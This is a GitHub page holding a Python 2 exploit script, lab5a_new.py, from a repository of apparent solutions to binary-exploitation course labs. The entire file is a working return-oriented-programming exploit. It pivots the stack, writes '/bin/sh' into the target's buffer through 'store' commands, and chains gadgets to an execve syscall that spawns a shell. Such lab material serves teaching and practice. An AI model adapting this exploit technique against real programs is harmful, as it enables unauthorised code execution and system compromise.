mbe-labs/lab5a_new.py at master · fumfel/mbe-labs · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/python2.7
import struct

payload = ""

JUNK = 0x00000000
PIVOT_ESP_44 = 0x08049bb7
POP_ECX_EBX = 0x0806f3d1
POP_EBX_EDI = 0x0806f3d1
INT_80 = 0x08048eaa
POP_EAX = 0x080bc4d6
POP_EDX = 0x80e6255
XOR_EAX = 0x08054c30
RET_4 = 0x0804854b

BUF_ADDR_PTR = 0xbffff518
BIN_SH_IDX = 61
BIN_SH_ADDR = BUF_ADDR_PTR + BIN_SH_IDX * 4

# Start from index 0 (Quend)
payload += str(JUNK)
# Index 1
payload += struct.pack('<L', POP_ECX_EBX)
# Index 2
payload += struct.pack('<L', BIN_SH_ADDR + 12)  # ??
# Index 3 (Quend)
payload += str(JUNK)
# Index 4
payload += struct.pack('<L', POP_EBX_EDI)
# Index 5
payload += struct.pack('<L', BIN_SH_ADDR)
# Index 6 (Quend)
payload += str(JUNK)
# Index 7
payload += struct.pack('<L', XOR_EAX)
# Index 8
payload += struct.pack('<L', POP_EDX)
# Index 9 (Quend)
payload += str(JUNK)
# Index 10
payload += struct.pack('<L', RET_4)
# Index 11
payload += struct.pack('<L', POP_EAX)
# Index 12 (Quend)
payload += str(JUNK)
# Index 13
payload += struct.pack('<L', 0xB)
# Index 14
payload += struct.pack('<L', INT_80)

idx = 0

# Write ROP chain to fragmented buffer
for chunk in [payload[i: i + 4] for i in range(0, len(payload), 4)]:
    if idx % 3 == 0:
        idx += 1
    else:
        val = str(struct.unpack("<L", chunk)[0])
        print "store\n" + val + "\n" + str(idx) + "\n"
        idx += 1

print "store\n" + str(struct.unpack("<L", b"/bin")[0]) + "\n" + str(BIN_SH_IDX) + "\n"
print "store\n" + str(struct.unpack("<L", b"/sh\x00")[0]) + "\n" + str(BIN_SH_IDX + 1) + "\n"
# Write ptr to //bin//sh string
print "store\n" + str(BIN_SH_ADDR) + "\n" + str(BIN_SH_IDX + 3) + "\n"
# Overwrite RA with pivot gadget
print "store\n" + str(PIVOT_ESP_44) + "\n" + str(-11) + "\n"
# End the party!
print "quit\n"